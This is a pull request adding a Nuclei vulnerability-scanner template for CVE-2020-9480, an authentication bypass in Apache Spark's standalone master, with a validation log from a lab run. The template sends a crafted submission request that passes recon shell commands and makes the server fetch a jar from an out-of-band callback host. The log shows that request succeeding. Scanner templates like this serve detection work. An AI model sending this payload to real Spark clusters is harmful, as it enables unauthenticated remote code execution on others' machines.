### PR TITLE
Add CVE-2020-9480 (vKEV)

### DIFF
--- a/http/cves/2020/CVE-2020-9480.yaml
+++ b/http/cves/2020/CVE-2020-9480.yaml
@@ -15,11 +15,12 @@ info:
     cve-id: CVE-2020-9480
     cwe-id: CWE-306
   metadata:
+    verified: true
     max-request: 1
     vendor: apache
     product: spark
     fofa-query: port="6066" && banner="Spark Master"
-  tags: cve,cve2020,apache,spark,auth-bypass
+  tags: cve,cve2020,apache,spark,auth-bypass,kev,vkev
 
 variables:
   url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"

--- a/http/cves/2020/CVE-2020-9480.yaml
+++ b/http/cves/2020/CVE-2020-9480.yaml
@@ -16,15 +16,17 @@ info:
     cwe-id: CWE-306
   metadata:
     max-request: 1
-  tags: cve,cve2020
+    vendor: apache
+    product: spark
+    fofa-query: port="6066" && banner="Spark Master"
+  tags: cve,cve2020,apache,spark,auth-bypass
 
 http:
   - raw:
-     - |
+      - |
         POST /v1/submissions/create HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Connection: close
 
         {
           "action": "CreateSubmissionRequest",
@@ -43,26 +45,18 @@ http:
           }
         }
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "submissionId"
-          - "driverState"
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - "contains(interactsh_protocol, 'http')"
+          - 'contains(body, "CreateSubmissionResponse")'
+          - 'contains_any(body, "submissionId", "driverState")'
+        condition: and
 
     extractors:
       - type: regex
         name: submission-id
         regex:
           - '"submissionId"\s*:\s*"([^"]+)"'
-      - type: regex
-        name: driver-state
-        regex:
           - '"driverState"\s*:\s*"([^"]+)"'

--- a/http/cves/2020/CVE-2020-9480.yaml
+++ b/http/cves/2020/CVE-2020-9480.yaml
@@ -1,0 +1,68 @@
+id: CVE-2020-9480
+
+info:
+  name: Apache Spark - Authentication Bypass
+  author: riteshs4hu
+  severity: critical
+  description: |
+    In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
+  reference:
+    - https://github.com/XiaoShaYu617/CVE-2020-9480/blob/main/20220624_apache_spark_apache_spark_pre-auth_code_execution_cve-2020-9480.py
+    - https://nvd.nist.gov/vuln/detail/cve-2020-9480
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-9480
+    cwe-id: CWE-306
+  metadata:
+    max-request: 1
+  tags: cve,cve2020
+
+http:
+  - raw:
+     - |
+        POST /v1/submissions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Connection: close
+
+        {
+          "action": "CreateSubmissionRequest",
+          "clientSparkVersion": "2.3.1",
+          "appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
+          "appResource": "http://{{interactsh-url}}",
+          "environmentVariables": {"SPARK_ENV_LOADED":"1"},
+          "mainClass": "Exploit",
+          "sparkProperties": {
+            "spark.jars": "http://{{interactsh-url}}",
+            "spark.driver.supervise": "false",
+            "spark.app.name": "Exploit",
+            "spark.eventLog.enabled": "true",
+            "spark.submit.deployMode": "cluster",
+            "spark.master": "spark://{{Hostname}}:6066"
+          }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "submissionId"
+          - "driverState"
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+    extractors:
+      - type: regex
+        name: submission-id
+        regex:
+          - '"submissionId"\s*:\s*"([^"]+)"'
+      - type: regex
+        name: driver-state
+        regex:
+          - '"driverState"\s*:\s*"([^"]+)"'

--- a/http/cves/2020/CVE-2020-9480.yaml
+++ b/http/cves/2020/CVE-2020-9480.yaml
@@ -21,6 +21,9 @@ info:
     fofa-query: port="6066" && banner="Spark Master"
   tags: cve,cve2020,apache,spark,auth-bypass
 
+variables:
+  url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"
+
 http:
   - raw:
       - |
@@ -32,11 +35,11 @@ http:
           "action": "CreateSubmissionRequest",
           "clientSparkVersion": "2.3.1",
           "appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
-          "appResource": "http://{{interactsh-url}}",
+          "appResource": "{{url}}",
           "environmentVariables": {"SPARK_ENV_LOADED":"1"},
           "mainClass": "Exploit",
           "sparkProperties": {
-            "spark.jars": "http://{{interactsh-url}}",
+            "spark.jars": "{{url}}",
             "spark.driver.supervise": "false",
             "spark.app.name": "Exploit",
             "spark.eventLog.enabled": "true",


### PR DESCRIPTION
### Template / PR Information

Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).

- References: https://nvd.nist.gov/vuln/detail/cve-2020-9480

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```bash
root@debian:~# nuclei -t 1.yaml -u http://172.19.0.2:6066 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

		projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2020-9480] Dumped HTTP request for http://172.19.0.2:6066/v1/submissions/create

POST /v1/submissions/create HTTP/1.1
Host: 172.19.0.2:6066
User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0
Content-Length: 637
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.3.1",
  "appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
  "appResource": "http://d3744jqu0g8gfgg1c27gdekqioa5tmwi7.oast.live",
  "environmentVariables": {"SPARK_ENV_LOADED":"1"},
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "http://d3744jqu0g8gfgg1c27guxphhiox85wtd.oast.live",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://172.19.0.2:6066:6066"
  }
}
[DBG] [CVE-2020-9480] Dumped HTTP response http://172.19.0.2:6066/v1/submissions/create

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json;charset=utf-8
Date: Sat, 20 Sep 2025 05:57:36 GMT
Server: Jetty(9.3.z-SNAPSHOT)

{
  "action" : "CreateSubmissionResponse",
  "message" : "Driver successfully submitted as driver-20250920055736-0003",
  "serverSparkVersion" : "2.3.3",
  "submissionId" : "driver-20250920055736-0003",
  "success" : true
}
[d3744jqu0g8gfgg1c27guxphhiox85wtd] Received HTTP interaction from 182.70.245.99 at 2025-09-20 05:57:38
------------
HTTP Request
------------

GET / HTTP/1.1
Host: d3744jqu0g8gfgg1c27guxphhiox85wtd.oast.live
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
User-Agent: Java/1.8.0_191




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.live
X-Interactsh-Version: 1.2.2

<html><head></head><body>dtw58xoihhpxug72c1ggfg8g0uqj4473d</body></html>

[CVE-2020-9480:status-1] [http] [critical] http://172.19.0.2:6066/v1/submissions/create [""submissionId" : "driver-20250920055736-0003""]
[CVE-2020-9480:word-2] [http] [critical] http://172.19.0.2:6066/v1/submissions/create [""submissionId" : "driver-20250920055736-0003""]
[CVE-2020-9480:word-3] [http] [critical] http://172.19.0.2:6066/v1/submissions/create [""submissionId" : "driver-20250920055736-0003""]

```
### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)